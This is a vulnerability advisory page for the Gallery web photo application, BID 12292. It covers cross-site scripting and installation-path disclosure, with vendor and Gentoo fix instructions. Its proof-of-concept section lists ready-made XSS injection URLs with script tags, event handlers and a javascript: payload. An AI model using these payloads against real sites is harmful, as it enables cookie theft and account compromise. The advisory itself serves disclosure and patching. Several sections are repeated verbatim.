Gallery Multiple Remote Vulnerabilities
BID:12292
Info
Gallery Multiple Remote Vulnerabilities
| Bugtraq ID: | 12292 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jan 17 2005 12:00AM |
| Credit: | Discovery of these vulnerabilities is credited to "Rafel Ivgi, The-Insider" <[email protected]>. |
| Vulnerable: |
Gallery Gallery 2.0 Alpha Gallery Gallery 1.4.4 -pl4 Gallery Gallery 1.4.4 -pl3 Gallery Gallery 1.4.4 -pl2 Gallery Gallery 1.4.3 -pl2 Gallery Gallery 1.4.3 -pl1 |
| Not Vulnerable: |
Gallery Gallery 1.4.4 -pl5 |
Discussion
Gallery Multiple Remote Vulnerabilities
Gallery is reported prone to multiple remote vulnerabilities. The following issues are reported:
It is reported that multiple cross-site scripting issues exist in Gallery. These vulnerabilities exist because user-supplied input is not sufficiently sanitized before this input is included in dynamically rendered HTML pages that are returned to a user.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected Web site and may allow for theft of cookie-based authentication credentials or other attacks.
An information disclosure vulnerability is reported to affect Gallery version 2.0 Alpha. It is reported that under some circumstances Gallery may return an error message that contains the installation path of the vulnerable Gallery installation.
A remote attacker may exploit this vulnerability to disclose information about the layout of the filesystem on a vulnerable computer. Information harvested in this manner may then be used to aid in further attacks that are launched against a vulnerable computer.
Gallery is reported prone to multiple remote vulnerabilities. The following issues are reported:
It is reported that multiple cross-site scripting issues exist in Gallery. These vulnerabilities exist because user-supplied input is not sufficiently sanitized before this input is included in dynamically rendered HTML pages that are returned to a user.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected Web site and may allow for theft of cookie-based authentication credentials or other attacks.
An information disclosure vulnerability is reported to affect Gallery version 2.0 Alpha. It is reported that under some circumstances Gallery may return an error message that contains the installation path of the vulnerable Gallery installation.
A remote attacker may exploit this vulnerability to disclose information about the layout of the filesystem on a vulnerable computer. Information harvested in this manner may then be used to aid in further attacks that are launched against a vulnerable computer.
Exploit / POC
Gallery Multiple Remote Vulnerabilities
The following examples are available:
Gallery v1.3.4-pl1:
http://www.example.com/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><script>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://www.example.com/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"
Gallery v1.4.4-pl2:
http://www.example.com/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*/%20onactivate%3Dalert%28%29%3e<plaintext>
http://www.example.com/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.google.com&cmd=
Gallery v2.0 Alpha:
1)http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview
2)http://www.example.com/g2/main.php?g2_return=www.example.com%2Fg2%2Fmain.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb343da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&g2_view=core:UserAdmin&g2_subView=core:UserAdmin
The following examples are available:
Gallery v1.3.4-pl1:
http://www.example.com/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><script>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://www.example.com/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://www.example.com/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"
Gallery v1.4.4-pl2:
http://www.example.com/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*/%20onactivate%3Dalert%28%29%3e<plaintext>
http://www.example.com/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.google.com&cmd=
Gallery v2.0 Alpha:
1)http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview
2)http://www.example.com/g2/main.php?g2_return=www.example.com%2Fg2%2Fmain.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb343da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&g2_view=core:UserAdmin&g2_subView=core:UserAdmin
Solution / Fix
Gallery Multiple Remote Vulnerabilities
Solution:
The vendor has released Gallery 1.4.4-pl5 to address these issues.
Gentoo has released advisory GLSA 200501-45 to address these issues. Gentoo users may carry out the following commands to update their computers:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/gallery-1.4.4_p6"
Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.
Gallery Gallery 1.4.3 -pl2
Gallery Gallery 1.4.3 -pl1
Gallery Gallery 1.4.4 -pl2
Gallery Gallery 1.4.4 -pl3
Gallery Gallery 1.4.4 -pl4
Solution:
The vendor has released Gallery 1.4.4-pl5 to address these issues.
Gentoo has released advisory GLSA 200501-45 to address these issues. Gentoo users may carry out the following commands to update their computers:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/gallery-1.4.4_p6"
Note: Users with the vhosts USE flag set should manually use
webapp-config to finalize the update.
Gallery Gallery 1.4.3 -pl2
-
Gallery 1.4.4-pl5
http://sourceforge.net/project/showfiles.php?group_id=7130&package_id= 7239&release_id=299701
Gallery Gallery 1.4.3 -pl1
-
Gallery 1.4.4-pl5
http://sourceforge.net/project/showfiles.php?group_id=7130&package_id= 7239&release_id=299701
Gallery Gallery 1.4.4 -pl2
-
Gallery 1.4.4-pl5
http://sourceforge.net/project/showfiles.php?group_id=7130&package_id= 7239&release_id=299701
Gallery Gallery 1.4.4 -pl3
-
Gallery 1.4.4-pl5
http://sourceforge.net/project/showfiles.php?group_id=7130&package_id= 7239&release_id=299701
Gallery Gallery 1.4.4 -pl4
References
Gallery Multiple Remote Vulnerabilities
References:
References:
- Gallery Product Page (Gallery)
- Release Name: 1.4.4-pl5 (Gallery)
- Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability ("Rafel Ivgi, The-Insider"